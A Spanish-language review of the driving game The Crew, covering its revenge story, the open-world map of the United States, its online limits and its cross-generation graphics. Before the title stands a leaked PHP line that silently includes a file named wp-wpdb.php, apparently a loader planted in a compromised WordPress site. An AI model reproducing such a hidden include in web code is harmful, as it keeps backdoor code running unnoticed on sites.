if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Crew – La Fortaleza de LeChuck

Análisis The Crew

analisis-the-crew

Los juegos de conducción tienen dos caminos predeterminados, los simuladores, que intentan acercarse a lo que es conducir un coche en la realidad, y los arcade, que enfocan sus carreras en la diversión, aunque la conducción sea irreal y exagerada. Hoy analizamos The Crew, un juego de coches que toma una base arcade, le mete opciones Online «sociales» y todo lo cruza con una gran realidad: la de poder recorrer Estados Unidos.

Historia.

Sí, una de las cosas que echamos en falta a veces en un juego de coches es que muchas veces carecen de protagonista, aunque sí hay juegos en los que nos dejan ver su cara casi es como de papel maché esperando que nosotros le demos nuestra propia personalidad. En The Crew tenemos un protagonista, Alex Taylor, un gran piloto de carreras ilegales que se ve envuelto en una historia de venganza, muy al estilo «Sleeping Dogs», que nos llevará a hacer lo que mejor se nos da: competir.

Jugabilidad.

Aquí entra el montante del asunto, si esto nos falla, el juego se va a la estantería y nunca más se supo de el. Por suerte, es poco probable que eso suceda con The Crew. El juego basa su jugabilidad en las carreras sí, pero no se trata de un «Need for Speed» más, habiendo dos grandes ingredientes: un poco de sandbox (o un todo si tenemos en cuenta que vamos sobre un coche) y el sistema online integrado. La historia tendrá un gran peso para ir siguiendo el desarrollo y continuamente por teléfono nos estarán indicando qué hacer y donde ir, pero eso no va a ser lo que hace grande a The Crew.

Como decíamos, el juego se basa en correr varios tipos de carreras y pruebas con nuestro coche, mientras le vamos aplicando mejoras, compramos otros coches, etc. Pero uno de sus puntos fuertes es el conducir de un lado para otro apreciando el paisaje y grandes monumentos insignia de Estados Unidos fielmente conseguidos (incluso más que en Grand Theft Auto V en Los Ángeles), con Hollywood, el Golden Gate, el Central Park de NY, el Space Needle de Seatle, Chinatown, el gran cañón de Colorado… Una auténtica pasada de recreación.

Las pruebas son realmente variadas, tenemos desde la típica carrera por un camino más o menos fijado por puntos de control, a pruebas de huir de otros coches y perderlos de vista, o la de perseguir a otro coche y pararlo a base de embestidas, y todo eso por supuesto lo podremos hacer de forma Online u Offline, de forma cooperativa en «campaña» o jugar de forma libre esas pruebas con todos los jugadores reales por Internet. Pero tener solo eso lo convertiría en un juego normal, un juego de carreras más ¿Qué tiene de diferente The Crew?. Para mi gusto, el componente Sandbox está muy trabajado, veremos todos los monumentos más emblemáticos de EE.UU. en su localización real, además de ciudades enormes, variopintas, con su gente, su tráfico… Estamos hablando de un mapa que con toda seguridad es unas seis veces más grande que Los Santos en Grand Theft Auto V.

The Crew

Todo ese inmenso terreno lo podremos descubrir con completa libertad e incluso hacer «vistas de águila», tan dadas en los juegos de Ubisoft, completando la localización y el mapeado punto por punto, eso sí, solo si encontramos antenas esparcidas por todo el mapa con la ayuda de nuestro radar.

El juego nos permite la opción «Viaje rápido» solamente si hemos descubierto ya la zona a la que queremos viajar, aunque también casi desde el principio, podremos utilizar los aeropuertos para viajar de una ciudad a otra. Aún así, The Crew premia que vayamos a todos los lugares a coche y no nos deja aburrirnos. De camino a nuestro objetivo, saldrán pruebas de todo tipo, Slalom (y con tráfico de por medio), paso por guías (Que se van estrechando y enrevesando según vamos superándolos), pruebas de velocidad máxima (sin salirse de la calzada) e incluso práctica de salto en rampas que nos señalizarán en un momento dado.

Las pruebas y las carreras normales nos darán dinero y piezas nuevas para nuestro coche, el cual podremos mejorar (y será necesaria) de forma manual o automática bajo recomendaciones en el propio juego. The Crew también nos permite comprar coches, entre turismos y todoterreno, con dinero real, aunque no es en absoluto necesario para disfrutar la experiencia, ya que precisamente eso nublaría los tiempos de mayor disfrute del juego, que es cuando estamos en «modo paseo» disfrutando de lo variado del paisaje según vamos un lugar u otro.

the crew 2

Otra cosa a destacar es la libertad que da el juego. La mayoría de los juegos de coches que presumen de darte libertad, normalmente ponen «vallas al campo» para que no puedas liarla haciendo el cabra, y eso fastidia bastante si se anuncian como «mundo abierto». En The Crew te dejan ir prácticamente por donde te de la gana (Recordando a Test Drive Unlimited), con muchas vallas que puedes destrozar de una embestida y continuar el camino sin problemas, con turismos o todoterrenos capaces de subir las más difíciles montañas. Eso junto a la espectacularidad de los escenarios hará que consigas grandes escenas y recreaciones.

The Crew tiene una gran pega , y es que el componente online es más sencillo de lo que podríamos esperar. En un mapa tan basto como es la recreación de Estados Unidos, solo encontraremos siete personas más conectadas al mismo tiempo, por lo que rara vez nos cruzaremos con otra persona, y aunque los podremos invitar a todos en las pruebas, queda lejos de esa lucha entre bandas que se supone es el juego. Lo que es una pega también es un alivio, la gente al cruzarse está tan emocionada de ver a otra persona que seguramente tendrá una tendencia a molestarte, como pasaba en GTA V Online. Me ha faltado probar a jugar con amigos en la misma «Crew» (Hasta cuatro haciendo el loco de forma «unida»), pues no he tenido la suerte de encontrar colegas unidos a la causa, al menos en la versión de Xbox One y es un modo que seguro multiplica la diversión (Como cualquier juego si estamos con amigos).

Apartado técnico

Si hablamos de gráficos, The Crew nos muestra una de cal y otra de arena. Los increíbles detalles, las recreaciones, los ciclos noche-día en tiempo real, el ENORME mapeado, los eventos con aviones, helicópteros o animales salvajes pasando cerca tuyo, todo eso está hecho con mimo y esmero, solo al alcance del presupuesto de las grandes compañías. Sin embargo, el juego vuelve a ser «Cross gen», lanzándose, además de en Xbox One (Versión analizada), Playstation 4 y PC, en Xbox 360. Eso hace que los gráficos huelan mucho a generación pasada, y aunque eso no empañe la jugabilidad, cierto es que cuando compramos un juego para las últimas máquinas, también queremos sentir que se está aprovechando su potencial. Y como decimos, tiene detalles realmente buenos, pero la resolución de The Crew parece algo baja, además de la ausencia de un buen «antialias», por lo que los dientes de sierra florecen en bastantes puntos (Cuando pasamos por zonas de hierba, los propios árboles…). También echamos en falta algo que habría sido la guinda al pastel de los detalles: efectos climatólogicos, los cuáles no aparecen, aunque veamos zonas de EE.UU. nevadas, cuando pasemos por allí siempre hará un tiempo envidiable si llegas en calidad de turista, pero no es la realidad.

The Crew 3

En cuanto a los efectos sonoros y música, el juego muestra un buen equilibrio. Los efectos en los coches y diferentes motores también están conseguidos, dejando de nuevo relucir una gran producción del juego. La música también estará presente, por supuesto, y nos ofrecen una buena cantidad de radios que reproducir en nuestros largos viajes. The Crew está totalmente traducido y doblado al castellano. Ubisoft es la compañía que más apuesta por traer sus juegos totalmente localizados a nuestro idioma, cosa que es de agradecer, por que siempre nos hablan cuando estamos dentro de un coche (obviamente, nunca nos bajamos), y no queremos parar para enterarnos (¿A qué no, Rockstar?).

the crew 4

Estamos ante un juego de coches que pone muchísima carne en el asador para darnos una larga duración, muchas cosas que hacer y posibilidades para disfrutar con nuestros amigos y hacer el cabra como el que más. El mapa es tan grande y detallado (resulta increíble que sea para un solo juego y no los reaprovechen) que hará que utilices la vista interior del coche para sentirte en la vida real, como si de tu gran viaje a Estados Unidos se tratara. Que los gráficos no te echen atrás, si te gustan los juegos de coches que se empeñan en darte diversión, The Crew es tu juego.